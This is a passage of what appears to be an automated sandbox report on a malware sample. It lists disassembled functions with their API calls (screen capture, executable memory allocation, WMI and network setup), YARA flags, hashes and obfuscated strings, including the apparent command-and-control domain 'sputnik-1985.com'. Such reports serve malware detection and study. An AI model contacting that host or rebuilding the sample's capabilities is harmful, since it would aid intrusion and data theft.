                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 05D0123114512877D7002A94DC09BCD7B1CDF09B66F108011FB0DE9080C7B0954046E5
                                                                                                                                                                                                                                        Function 0040DF92 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 839 40df92-40dfdb CoInitializeSecurity
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040DFA4
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InitializeSecurity
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 640775948-0
                                                                                                                                                                                                                                        • Opcode ID: c197b67b38e7a9dfb84c75cb0c47c94d45024fd2fc4afd10e6e7abe74b422134
                                                                                                                                                                                                                                        • Instruction ID: ccd3c5eb67ff0c959232c13284a4feb1b70bc0ce71dfd05ddd5b0dd8dbfc25b4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c197b67b38e7a9dfb84c75cb0c47c94d45024fd2fc4afd10e6e7abe74b422134
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AAE04F763843026BE7688B789D57B01228697C5B28F368235F716AF2E5EAB474064909
                                                                                                                                                                                                                                        Function 0040AB12 Relevance: 1.5, APIs: 1, Instructions: 20networkCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 840 40ab12-40ab5b call 441c40 * 2 WSAStartup
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • WSAStartup.WS2_32(00000202), ref: 0040AB46
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Startup
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 724789610-0
                                                                                                                                                                                                                                        • Opcode ID: b187d8107ffde8e05c7d0a09cdfc1bb296f851924af62c815b9bdc52e44f9908
                                                                                                                                                                                                                                        • Instruction ID: 8daa5b18d499817a70b2f557c0c6df6f58e6f2abf740e83111143c9212bc1643
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b187d8107ffde8e05c7d0a09cdfc1bb296f851924af62c815b9bdc52e44f9908
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0AE02B7A5D5104BBF2486751FD4FC563616BB4330AB08413DFC185017BD6511426C66A
                                                                                                                                                                                                                                        Function 0043EB40 Relevance: 1.5, APIs: 1, Instructions: 15memoryCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL(?,00000000,?,004402AB,?,0040B9C7,00000000,00000001), ref: 0043EB60
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FreeHeap
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3298025750-0
                                                                                                                                                                                                                                        • Opcode ID: 81edc790b0ddca4267d7eff7df3f20d03a026a9a6739d0257eb6886926d10809
                                                                                                                                                                                                                                        • Instruction ID: 6306fd139b63709815d779222b474fbda691f96f30962fae2caf2063fc0eb5d0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 81edc790b0ddca4267d7eff7df3f20d03a026a9a6739d0257eb6886926d10809
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FDD0C931445536FBC6102F28BC06BCB3B94EF497A5F0708A5F540AA075E725DC918AD8
                                                                                                                                                                                                                                        Function 004404B1 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetForegroundWindow.USER32 ref: 004404BF
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ForegroundWindow
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2020703349-0
                                                                                                                                                                                                                                        • Opcode ID: 6f507deb5e1f19d761a5d5784f4b45f47d149ac39b8a1577dd60edd7b15305f7
                                                                                                                                                                                                                                        • Instruction ID: 7f86c14d6ce35f706de72b94d0a04e46592ace6e5707a2a12f6891b8fa8e10aa
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6f507deb5e1f19d761a5d5784f4b45f47d149ac39b8a1577dd60edd7b15305f7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 15E0E2B9900214DBEB44CF68FC9592933B5EB8B3093040439E202C3362EA34E602CF59
                                                                                                                                                                                                                                        Function 0043EB20 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(?,00000000,?,E931068D,004089CF,6W01), ref: 0043EB30
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                                                                                        • Opcode ID: 79e8824736e673c164acaa36c8672ab8da0624bb6b492fb9ad0aed697a58ad7a
                                                                                                                                                                                                                                        • Instruction ID: faa30900258afa928b287b4fa720072893bcbdc8cd762d9751037a3417221d58
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 79e8824736e673c164acaa36c8672ab8da0624bb6b492fb9ad0aed697a58ad7a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 91C04C31045120ABD5506B15EC05BC63B54DF852A5F020065B105660718660ACC2C698
                                                                                                                                                                                                                                        Function 00480465 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 004804B6
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541906304.0000000000480000.00000040.00001000.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_480000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                                                                                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                        • Instruction ID: 6175ed9e119c1fa8be5b6913f300576b83b0615bc37c480c2bb8ecb1c49c856d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1C116C79A40208EFDB01DF98CA85E9CBBF1AF08750F058095FA489B362D335EA50DF80

                                                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                                                        Function 02124166 Relevance: 72.8, Strings: 58, Instructions: 350COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: &$&$($-$/$0$0$1$1$2$4$43A2C7AD89C30672D0632DF0E28DC412$7$8$:$>$>$?$?$@$@$A$B$D$F$H$J$L$N$N$Q$V$X$\$^$`$b$d$f$f$h$h$j$l$n$n$p$q$r$sputnik-1985.com$t$v$x$x$z$|$}$~
                                                                                                                                                                                                                                        • API String ID: 0-3477518189
                                                                                                                                                                                                                                        • Opcode ID: c5d1dad0e18394a26f368b4fdc11b7f874ac40861fef3467ff25af8bb3c0dbef
                                                                                                                                                                                                                                        • Instruction ID: 06f791bbfc6e9ef83a1bd1c61cbcebbad1d7d3ac43852dd20b3f834cf4bced95
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c5d1dad0e18394a26f368b4fdc11b7f874ac40861fef3467ff25af8bb3c0dbef
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5E0251219087D98DDB22C67C8C583DDBFA11B63224F1883DDD1E86B3D6D7B9054ACB62
                                                                                                                                                                                                                                        Function 00423EFF Relevance: 72.8, Strings: 58, Instructions: 350COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: &$&$($-$/$0$0$1$1$2$4$43A2C7AD89C30672D0632DF0E28DC412$7$8$:$>$>$?$?$@$@$A$B$D$F$H$J$L$N$N$Q$V$X$\$^$`$b$d$f$f$h$h$j$l$n$n$p$q$r$sputnik-1985.com$t$v$x$x$z$|$}$~
                                                                                                                                                                                                                                        • API String ID: 0-3477518189
                                                                                                                                                                                                                                        • Opcode ID: c5d1dad0e18394a26f368b4fdc11b7f874ac40861fef3467ff25af8bb3c0dbef
                                                                                                                                                                                                                                        • Instruction ID: 27bd2a0d4c2ee2dbe7fab43400867feab0dee6ac78a78b22b0fd1ff9dbe20428
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c5d1dad0e18394a26f368b4fdc11b7f874ac40861fef3467ff25af8bb3c0dbef
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 45026021D087D989DB22C67C8C483CDBFA11B63324F4843EDD5E86B3D6D6B90946CB66
                                                                                                                                                                                                                                        Function 0213A756 Relevance: 54.1, Strings: 43, Instructions: 311COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: %$+$0$3$9$:$<$=$>$A$C$D$E$G$I$K$L$M$a$a$c$c$e$e$g$g$i$i$k$k$m$m$n$o$o$q$s$u$w$x$y${$}
                                                                                                                                                                                                                                        • API String ID: 0-1785674967
                                                                                                                                                                                                                                        • Opcode ID: 0e20f868d951b71e29e37dcac279c8b11e3bc4ef153ff36d24d69365c9a94d1d
                                                                                                                                                                                                                                        • Instruction ID: f5b7b5b76bc1283b813f01dfb8048a88cf44e4624b73e5e1f204a807c6766b69
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0e20f868d951b71e29e37dcac279c8b11e3bc4ef153ff36d24d69365c9a94d1d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 75F161319086E98ADB36CA3C8C443DDBFA25F52324F0947D9D0A96B3D2C7754B86CB61
                                                                                                                                                                                                                                        Function 0043A4EF Relevance: 54.1, Strings: 43, Instructions: 311COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: %$+$0$3$9$:$<$=$>$A$C$D$E$G$I$K$L$M$a$a$c$c$e$e$g$g$i$i$k$k$m$m$n$o$o$q$s$u$w$x$y${$}
                                                                                                                                                                                                                                        • API String ID: 0-1785674967
                                                                                                                                                                                                                                        • Opcode ID: 2f73bd405479f8443e137748fc13915d6267971bf3abd56322ba3364d03874fc
                                                                                                                                                                                                                                        • Instruction ID: 5a335782380f72e06434a0b7d1c84293c6c1cbd051fad8399b30b8532d7f13f9
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2f73bd405479f8443e137748fc13915d6267971bf3abd56322ba3364d03874fc
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0EF170319086E98ADB22C63C8C443DDBFB15B56324F0847D9D0A96B3D2C7794F86CB66
                                                                                                                                                                                                                                        Function 02139B8A Relevance: 50.4, Strings: 40, Instructions: 391COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: $$*$-$1$2$4$5$7$<$=$=$=$F$F$G$H$I$O$S$S$T$U$Y$Z$]$_$c$e$f$i$i$j$j$r$s$t$w$x${$~
                                                                                                                                                                                                                                        • API String ID: 0-3597792095
                                                                                                                                                                                                                                        • Opcode ID: c3789e24d09f43a8b0542d61fba22105114c5098dcea2457330ee2163c950db7
                                                                                                                                                                                                                                        • Instruction ID: 32d01b67cc353d10cde139d5793501b7efac64c1f39d8d77eeb7cab383b85d69
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c3789e24d09f43a8b0542d61fba22105114c5098dcea2457330ee2163c950db7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 55225C219087EA89DB32C67C8C483CDBFA15B67224F1843D9D4F86B3D6C7750A46CB66
                                                                                                                                                                                                                                        Function 00439923 Relevance: 50.4, Strings: 40, Instructions: 391COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: $$*$-$1$2$4$5$7$<$=$=$=$F$F$G$H$I$O$S$S$T$U$Y$Z$]$_$c$e$f$i$i$j$j$r$s$t$w$x${$~
                                                                                                                                                                                                                                        • API String ID: 0-3597792095
                                                                                                                                                                                                                                        • Opcode ID: f86ff687baa644721faa94586d0f4356f2d95a52b60ef36798eae4a41bc52f90
                                                                                                                                                                                                                                        • Instruction ID: be7a992d2d4842197a1748c1c2319ac7c28ec811ade833faf29c06d267706092
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f86ff687baa644721faa94586d0f4356f2d95a52b60ef36798eae4a41bc52f90
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E8224F219087EA89DB32C67C8C483CDBFA15B67224F1843D9D4F86B3D6C7750A46CB66
                                                                                                                                                                                                                                        Function 0213BAD7 Relevance: 32.4, APIs: 8, Strings: 10, Instructions: 880memorycomCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CoCreateInstance.COMBASE(CDCCD3E7,00000000,00000001,?,00000000), ref: 0213BF33
                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32(37C935C6), ref: 0213BFAD
                                                                                                                                                                                                                                        • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0213BFEB
                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32(37C935C6), ref: 0213C050
                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32(37C935C6), ref: 0213C137
                                                                                                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 0213C1A5
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocString$BlanketCreateInitInstanceProxyVariant
                                                                                                                                                                                                                                        • String ID: M$96$:;$%$F*R($[&h$$e?^$k"@ $n:T8$#~|$#~|
                                                                                                                                                                                                                                        • API String ID: 65563702-2807872674
                                                                                                                                                                                                                                        • Opcode ID: 9f1f51344e39299604904236268e70905638ee0f88f663c1ee43faa23c8ba667
                                                                                                                                                                                                                                        • Instruction ID: 0cd05f757dc3eed905580ea7652814695fe187d5ea0e63938db7464b1f23f01d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9f1f51344e39299604904236268e70905638ee0f88f663c1ee43faa23c8ba667
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3652E0726483408BD724CF28C8917ABFBE2EFC5314F188A2DE5959B391D775D806CB92
                                                                                                                                                                                                                                        Function 00436980 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 230windowCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetDC.USER32(00000000), ref: 00436989
                                                                                                                                                                                                                                        • GetSystemMetrics.USER32(0000004C), ref: 00436999
                                                                                                                                                                                                                                        • GetSystemMetrics.USER32(0000004D), ref: 004369A1
                                                                                                                                                                                                                                        • GetCurrentObject.GDI32(00000000,00000007), ref: 004369AA
                                                                                                                                                                                                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 004369BA
                                                                                                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 004369C1
                                                                                                                                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 004369D0
                                                                                                                                                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004369DB
                                                                                                                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 004369E7
                                                                                                                                                                                                                                        • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 00436A0A
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Object$CompatibleCreateMetricsSystem$BitmapCurrentDeleteSelect
                                                                                                                                                                                                                                        • String ID: Y
                                                                                                                                                                                                                                        • API String ID: 1298755333-3233089245
                                                                                                                                                                                                                                        • Opcode ID: c24b2a11f15356cf646cf834205c4c04271eabb57bf08da4818dca27ea7b735a
                                                                                                                                                                                                                                        • Instruction ID: ce6842184c50d62c14bce23637ee5c5f438d7dfa952fd3edf86735d4080956a5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c24b2a11f15356cf646cf834205c4c04271eabb57bf08da4818dca27ea7b735a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4A81C33A158310EFD7489FB4AC49A3B7BA5FB8A352F050C3CF546D2290C73995168B2B
                                                                                                                                                                                                                                        Function 00425100 Relevance: 25.0, APIs: 3, Strings: 11, Instructions: 480COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000), ref: 004251AA
                                                                                                                                                                                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000), ref: 00425243
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                        • String ID: +$e$+$e$%\)R$,X*^$.T'j$1D6Z$:@&F$?P:V$C`<f$XY$]RB
                                                                                                                                                                                                                                        • API String ID: 237503144-2846770461
                                                                                                                                                                                                                                        • Opcode ID: be84ad2a2dc8deef5579fea24953012850529ab1ccaeb00d1e318e8ad6242404
                                                                                                                                                                                                                                        • Instruction ID: b6d59b0557f70d7ec2d4011febfa6e18cf4a5b2df19338a98cc8181bc2575411
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: be84ad2a2dc8deef5579fea24953012850529ab1ccaeb00d1e318e8ad6242404
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E7F1EDB4208350DFD310DF69E89166BBBE0FFC5314F54892DE5958B362E7B88906CB46
                                                                                                                                                                                                                                        Function 00419840 Relevance: 16.7, APIs: 2, Strings: 7, Instructions: 936COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00419CE7
                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00419D24
                                                                                                                                                                                                                                          • Part of subcall function 004402C0: LdrInitializeThunk.NTDLL(0044316E,00000002,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 004402EE
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FreeLibrary$InitializeThunk
                                                                                                                                                                                                                                        • String ID: ~|$SP$if$Mw$pv$tj$vt
                                                                                                                                                                                                                                        • API String ID: 764372645-2706247287
                                                                                                                                                                                                                                        • Opcode ID: 6f3e0809db8a7ee577943ce01a0a1cb86fff2ea56a37afda839586e8e533a568
                                                                                                                                                                                                                                        • Instruction ID: c1c817f51924b2b6e01bbc71c3bfe870e6f9d21007064de5033cd7ab66586395
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6f3e0809db8a7ee577943ce01a0a1cb86fff2ea56a37afda839586e8e533a568
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5D624770609310AFE724CB15DC9176BB7E2EFC5314F18862DF495973A1D378AC858B4A
                                                                                                                                                                                                                                        Function 00425D6A Relevance: 15.8, Strings: 12, Instructions: 778COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: $@7F$(X#^$+\1R$-T,j$2E1G$4D2Z$8I>K$T`Sf$Wdz$&$$qs$uVw
                                                                                                                                                                                                                                        • API String ID: 0-2419925205
                                                                                                                                                                                                                                        • Opcode ID: b98f95cc8d7a7bfe044da580c8a45b468910242ccf89acd057331744f3faff64
                                                                                                                                                                                                                                        • Instruction ID: c261d025133841230159ca5431fd9423a817dc7e9349410c690f11e8db15d26c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b98f95cc8d7a7bfe044da580c8a45b468910242ccf89acd057331744f3faff64
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FA7283B4A05269CFDB24CF55D881BDDBBB2FB46300F1181E9C5496B362DB349A86CF84
                                                                                                                                                                                                                                        Function 021260B7 Relevance: 15.5, Strings: 12, Instructions: 458COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
